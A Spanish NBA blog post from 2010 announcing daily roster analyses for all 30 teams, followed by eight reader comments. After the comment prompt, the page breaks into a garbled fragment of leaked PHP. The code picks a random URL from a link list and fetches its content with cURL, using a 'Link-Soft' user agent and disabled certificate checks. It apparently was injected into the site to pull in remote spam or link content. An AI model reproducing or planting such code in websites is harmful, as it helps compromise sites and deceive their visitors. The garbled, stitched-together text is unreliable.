Análisis 2010/2011

27 de September de 2010 por txusma

30 días faltan para que arranque la temporada NBA 2010-2011. En TJNBA estamos ansiosos por disfrutar de los innumerables alicientes que prepara el nuevo curso: los Heat de James, Wade & Bosh, las suspensiones indefendibles de Kevin Durant y Dirk Nowitzki, las asistencias inimaginables de Steve Nash, Deron Williams y Chris Paul, los mates imparables de Amaré en el Madison,  los dribblings vertiginosos de John Wall… y, por supuesto, un nuevo capítulo de la mayor (y mejor) rivalidad en la historia del deporte: Lakers vs Celtics.

¿Qué mejor manera de sobrellevar estos 30 días que con el análisis de cada una de las plantillas de las 30 franquicias de la NBA? Cada día, a partir de hoy, publicaremos un análisis hasta el martes 26 de octubre, día en que un Heat-Celtics servirá para estrenar la temporada.

En esta entrada iremos añadiendo los enlaces a cada uno de los análisis, para que los tengáis todos a mano. Disfrutad y consideraos invitados a participar con vuestros comentarios.

It’s game time!!

Análisis 2010/2011

Comenta

8 comentarios a esta entrada

  1. Rompe dice:
    #1

    Qué ganas de que empiece la temporada! Esto sólo me impacientará aún más! Mala gente! 😛

      Citar

  2. sayim dice:
    #2

    Felicidades por otra nueva temporada de cobertura NBA. Genial idea lo de sacar el análisis de un equipo cada día… ¿Este año va a haber porra?

    Un saludo y gracias por vuestro esfuerzo

      Citar

  3. MagicJohnson32 dice:
    #3

    Gracias a vosotros por seguirnos.

    Por supuesto que habrá porra. Esperaremos a que se acerque más el inicio de temporada y acaben de definirse las plantillas para poder hacerlas con una mejor base.

      Citar

  4. Jose Luis dice:
    #4

    Pues eso, deseando que empiece ya la temporada, porque la pretemporada es para probar e ir haciendo ajustes, a ver que va pasando con los distintos equipos.

    Gracias por este blog!

      Citar

  5. kantonyo dice:
    #5

    Es curioso el dato de que uno de los artículos mas leídos es el de Phoenix. No sabia que los Suns suscitaban tanto interés…

      Citar

  6. Jabho dice:
    #6

    Diría que es porque se generó cierto debate en torno a Nash….A mi me sorprende el poco interés en los Celtics 🙁 … aunque lo cierto es que los Lakers ya eran el equipo con más seguidores y ahora con Pau más.

      Citar

  7. makena dice:
    #7

    nadie se ha dado cuenta de que falta el analisis de los Denver?¿?¿ esq este año no cuentan? :p

      Citar

  8. TheDeerHunter dice:
    #8

    sí que están analizados… pero no los enlaces no han sido actualizados del todo
    procedo…

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>